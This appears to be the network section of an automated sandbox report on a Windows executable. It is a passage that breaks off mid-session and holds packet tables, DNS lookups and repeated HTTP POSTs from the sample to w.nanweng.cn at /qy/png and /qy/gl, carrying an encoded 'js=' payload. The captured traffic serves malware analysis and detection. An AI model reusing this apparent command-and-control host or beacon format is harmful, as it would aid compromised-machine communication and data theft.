                                                                                                                                                                                                        Jan 3, 2025 15:26:18.108695984 CET4974380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.108742952 CET4974480192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.625189066 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.625245094 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630196095 CET804978547.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630211115 CET804978647.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630315065 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630502939 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630502939 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630520105 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630525112 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630568981 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.635293007 CET804978647.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.635315895 CET804978647.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.635392904 CET804978547.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.635401964 CET804978547.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:30.107601881 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:30.107644081 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.124519110 CET4985980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.124522924 CET4986080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129436016 CET804985947.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129447937 CET804986047.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129502058 CET4985980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129525900 CET4986080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129635096 CET4986080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129647017 CET4986080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129673958 CET4985980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129703999 CET4985980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.134470940 CET804986047.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.134490967 CET804986047.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.134505033 CET804985947.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.134614944 CET804985947.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:42.107786894 CET4986080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:42.107872963 CET4985980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.626362085 CET4993780192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.626559973 CET4993880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.640237093 CET804993747.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.640259981 CET804993847.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.640352011 CET4993780192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.640783072 CET4993880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.676642895 CET4993880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.676662922 CET4993880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.681459904 CET804993847.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.681476116 CET804993847.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.742341995 CET4993780192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.743345976 CET4993780192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.748398066 CET804993747.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.748949051 CET804993747.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:54.107676983 CET4993880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:54.107707024 CET4993780192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.420900106 CET5002880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.425728083 CET805002847.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.426803112 CET5002880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.427057981 CET5002880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.431802988 CET805002847.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:02.420213938 CET5002880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:02.467288971 CET805002847.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:03.045876026 CET5002980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:03.054502964 CET805002947.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:03.054604053 CET5002980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:03.054822922 CET5002980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:03.059870005 CET805002947.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.045233011 CET5002980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.091332912 CET805002947.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.670979977 CET5003080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.675928116 CET805003047.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.676018953 CET5003080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.676209927 CET5003080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.680954933 CET805003047.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:09.670139074 CET5003080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:09.715260029 CET805003047.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.296603918 CET5003180192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.301666021 CET805003147.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.301776886 CET5003180192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.301943064 CET5003180192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.306745052 CET805003147.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.424968004 CET5003280192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.429975033 CET805003247.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.430074930 CET5003280192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.430201054 CET5003280192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.430227995 CET5003280192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.434942961 CET805003247.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.435033083 CET805003247.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:20.786673069 CET805002847.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:20.786740065 CET5002880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.107603073 CET5003280192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.109529018 CET5003380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.114413977 CET805003347.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.114512920 CET5003380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.114681005 CET5003380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.114716053 CET5003380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.119434118 CET805003347.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.119596958 CET805003347.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:24.444937944 CET805002947.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:24.445110083 CET5002980192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:28.038558960 CET805003047.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:28.038645983 CET5003080192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:31.661268950 CET805003147.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:27:31.661350965 CET5003180192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:27:34.107848883 CET5003380192.168.2.547.103.45.17

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.239998102 CET6280553192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.640136957 CET53628051.1.1.1192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:25:55.308867931 CET4990653192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:25:57.210992098 CET6435453192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.135993958 CET5539653192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.137765884 CET5008953192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.145703077 CET53500891.1.1.1192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.213023901 CET6013953192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.219693899 CET53601391.1.1.1192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.352000952 CET6431053192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:04.352897882 CET5046853192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.454942942 CET5823053192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.496112108 CET53582301.1.1.1192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.500089884 CET6328353192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:08.507715940 CET6187353192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:08.550780058 CET53618731.1.1.1192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:58.479439974 CET5363153192.168.2.51.1.1.1
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.419344902 CET53536311.1.1.1192.168.2.5

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.239998102 CET192.168.2.51.1.1.10xec95Standard query (0)w.nanweng.cnA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:25:55.308867931 CET192.168.2.51.1.1.10xfd05Standard query (0)www.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:25:57.210992098 CET192.168.2.51.1.1.10x36d2Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.135993958 CET192.168.2.51.1.1.10x9a78Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.137765884 CET192.168.2.51.1.1.10xf1a1Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.213023901 CET192.168.2.51.1.1.10x4679Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.352000952 CET192.168.2.51.1.1.10xfba8Standard query (0)browser.events.data.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:04.352897882 CET192.168.2.51.1.1.10x9464Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.454942942 CET192.168.2.51.1.1.10xf37aStandard query (0)2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.500089884 CET192.168.2.51.1.1.10xff9dStandard query (0)45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:08.507715940 CET192.168.2.51.1.1.10x2218Standard query (0)238358d141a1b2850f10e9a50017a441.clo.footprintdns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:58.479439974 CET192.168.2.51.1.1.10xc861Standard query (0)w.nanweng.cnA (IP address)IN (0x0001)false

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.640136957 CET1.1.1.1192.168.2.50xec95No error (0)w.nanweng.cn47.103.45.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:25:55.315571070 CET1.1.1.1192.168.2.50xfd05No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:25:57.217885971 CET1.1.1.1192.168.2.50x36d2No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.142545938 CET1.1.1.1192.168.2.50x9a78No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.145703077 CET1.1.1.1192.168.2.50xf1a1No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.145703077 CET1.1.1.1192.168.2.50xf1a1No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.145703077 CET1.1.1.1192.168.2.50xf1a1No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.145703077 CET1.1.1.1192.168.2.50xf1a1No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.219693899 CET1.1.1.1192.168.2.50x4679No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.219693899 CET1.1.1.1192.168.2.50x4679No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.219693899 CET1.1.1.1192.168.2.50x4679No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.219693899 CET1.1.1.1192.168.2.50x4679No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.359489918 CET1.1.1.1192.168.2.50xfba8No error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:04.359673977 CET1.1.1.1192.168.2.50x9464No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.496112108 CET1.1.1.1192.168.2.50xf37aName error (3)2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.548281908 CET1.1.1.1192.168.2.50xff9dNo error (0)45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.comma1prdapp01-canary.netmon.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.548281908 CET1.1.1.1192.168.2.50xff9dNo error (0)ma1prdapp01-canary.netmon.azure.comma1prdapp01-canary.southindia.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:08.550780058 CET1.1.1.1192.168.2.50x2218Name error (3)238358d141a1b2850f10e9a50017a441.clo.footprintdns.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:10.588109970 CET1.1.1.1192.168.2.50xc8f1No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.419344902 CET1.1.1.1192.168.2.50xc861No error (0)w.nanweng.cn47.103.45.17A (IP address)IN (0x0001)false

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • https:
                                                                                                                                                                                                          • code.jquery.com
                                                                                                                                                                                                          • sb.scorecardresearch.com
                                                                                                                                                                                                        • w.nanweng.cn
                                                                                                                                                                                                        • w.nanweng.cn

                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.54970747.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.648322105 CET223OUTPOST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.648488045 CET13OUTData Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.54970847.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.648333073 CET223OUTPOST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:25:54.648375034 CET331OUTData Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.2.54974347.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224415064 CET223OUTPOST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224431038 CET13OUTData Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        3192.168.2.54974447.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224539995 CET223OUTPOST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224558115 CET331OUTData Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        4192.168.2.54978647.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630502939 CET223OUTPOST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630520105 CET331OUTData Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        5192.168.2.54978547.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630525112 CET223OUTPOST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630568981 CET13OUTData Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        6192.168.2.54986047.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129635096 CET223OUTPOST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129647017 CET13OUTData Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        7192.168.2.54985947.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129673958 CET223OUTPOST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:31.129703999 CET331OUTData Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.2.54993847.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.676642895 CET223OUTPOST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
